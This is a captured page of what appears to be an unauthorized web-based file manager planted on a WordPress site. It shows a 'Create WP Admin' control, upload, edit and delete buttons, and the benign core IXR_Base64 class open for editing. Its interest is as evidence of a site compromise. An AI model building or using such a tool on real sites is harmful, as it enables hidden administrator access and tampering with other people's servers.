?? GreyFile — Mystic File Browser
Current path:
home
/
webdevt
/
www
/
demo3
/
wp-includes
/
IXR
/
?? Create WP Admin
??
Go up: /home/webdevt/www/demo3/wp-includes
?? Editing: class-IXR-base64.php
<?php /** * IXR_Base64 * * @package IXR * @since 1.5.0 */ class IXR_Base64 { var $data; /** * PHP5 constructor. */ function __construct( $data ) { $this->data = $data; } /** * PHP4 constructor. */ public function IXR_Base64( $data ) { self::__construct( $data ); } function getXml() { return '<base64>'.base64_encode($this->data).'</base64>'; } }
Save
Upload
??
Create Folder
??
Create File
??
class-IXR-base64.php
|
?? Edit
|
??? Delete
??
class-IXR-client.php
|
?? Edit
|
??? Delete
??
class-IXR-clientmulticall.php
|
?? Edit
|
??? Delete
??
class-IXR-date.php
|
?? Edit
|
??? Delete
??
class-IXR-error.php
|
?? Edit
|
??? Delete
??
class-IXR-introspectionserver.php
|
?? Edit
|
??? Delete
??
class-IXR-message.php
|
?? Edit
|
??? Delete
??
class-IXR-request.php
|
?? Edit
|
??? Delete
??
class-IXR-server.php
|
?? Edit
|
??? Delete
??
class-IXR-value.php
|
?? Edit
|
??? Delete